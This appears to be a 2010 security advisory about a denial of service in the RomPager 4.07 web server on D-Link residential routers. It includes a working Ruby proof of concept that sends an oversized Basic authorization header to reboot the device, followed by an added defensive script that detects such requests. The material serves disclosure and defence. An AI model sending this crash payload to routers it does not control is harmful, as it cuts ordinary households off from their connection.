
RomPager 4.07 Denial Of Service

08 Dec 2010 00:00:00 | Reported by Ricky-Lee Birtles | Type: packetstorm | Source: packetstormsecurity.com

RomPager 4.07 Denial Of Service vulnerability on residential router

Code
`Software: "RomPager/4.07 UPnP/1.0"  
  
Issue: A reboot can be caused when a specially crafted HTTP request is sent.  
  
Other Details: This version of RomPager is seen on a number of  
residential routers that are shipped by a number of different ISPs.  
The router I personally know it affects is the D-Link DSL-2640R shipped  
by Virgin Media. I also do believe this affects the D-Link DSL-2641R.  
  
I have made www.allegrosoft.com aware of the issue (the creators of  
RomPager) and they have stated that version is very old and outdated  
and should no longer be used and they stated they have been unable to  
replicate the issue. This would lead me to believe it has something to  
do with the ISP's customer firmware. I have contacted Virgin Media to  
make them aware of the issue (this was over a month ago) so I am now  
making this public.  
  
If other people have a home router running the RomPager 4.07 software  
please try the Ruby script provided below and see if your router  
restarts as well, then add the make and model of router along with the  
location this was obtained.  
  
This is an assumption, however I do think this could be further  
exploited by close investigation with JTAG access to the device,  
however at the moment I am guessing the router's software watchdog  
kicks in and restarts the router.  
  
Ruby Script:  
  
require 'net/https'  
  
url = URI.parse("http://IP/")  
data = nil  
headers = {  
"Host" => "IP",  
"Authorization" => "Basic  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
}  
res = Net::HTTP.start(url.host, url.port) do |http|  
http.use_ssl = false  
http.send_request("GET", url.path, data, headers)  
end  
  
puts res.body  
  
Regards,  
-- Mr R Birtles  
  
`
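
For defenders who need to inventory devices showing this banner or watch for requests shaped like the one in the script, the following is an added example and not part of the original advisory. It extracts the RomPager version from a `Server` banner and flags `Authorization: Basic` values that cannot be a normal credential; the function names, the 256-character limit and the sample requests are assumptions constructed for this example.

```ruby
require 'base64'

# Assumed ceiling for base64("user:password"); chosen for this example,
# not a value taken from the advisory.
MAX_BASIC_CRED_LEN = 256

# Returns the RomPager version found in a Server banner, or nil.
def rompager_version(server_header)
  m = server_header.to_s.match(%r{RomPager/(\d+(?:\.\d+)*)})
  m && m[1]
end

# Returns a reason string when a Basic credential looks malformed, or nil
# when it is plausible (or the header uses another scheme).
def basic_auth_anomaly(value)
  scheme, cred = value.to_s.strip.split(/\s+/, 2)
  return nil unless scheme&.casecmp?('Basic')
  return 'missing credential' if cred.nil? || cred.empty?
  return "credential too long (#{cred.length} chars)" if cred.length > MAX_BASIC_CRED_LEN
  decoded = begin
    Base64.strict_decode64(cred)
  rescue ArgumentError
    return 'credential is not valid base64'
  end
  decoded.include?(':') ? nil : 'decoded credential has no user:password separator'
end

# Scans raw request header blocks; returns [index, reason] for each anomaly.
def scan_requests(raw_requests)
  raw_requests.each_with_index.filter_map do |raw, i|
    auth = raw.lines.find { |l| l =~ /\AAuthorization:/i }
    next unless auth
    reason = basic_auth_anomaly(auth.split(':', 2)[1])
    [i, reason] if reason
  end
end

# Constructed sample input (not captured traffic); 192.0.2.1 is a documentation address.
SAMPLE_REQUESTS = [
  "GET / HTTP/1.1\r\nHost: 192.0.2.1\r\nAuthorization: Basic #{Base64.strict_encode64('admin:admin')}\r\n\r\n",
  "GET / HTTP/1.1\r\nHost: 192.0.2.1\r\nAuthorization: Basic #{'A' * 400}\r\n\r\n",
  "GET / HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"
].freeze

if __FILE__ == $PROGRAM_NAME
  puts rompager_version('RomPager/4.07 UPnP/1.0')
  scan_requests(SAMPLE_REQUESTS).each { |i, why| puts "request #{i}: #{why}" }
end
```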
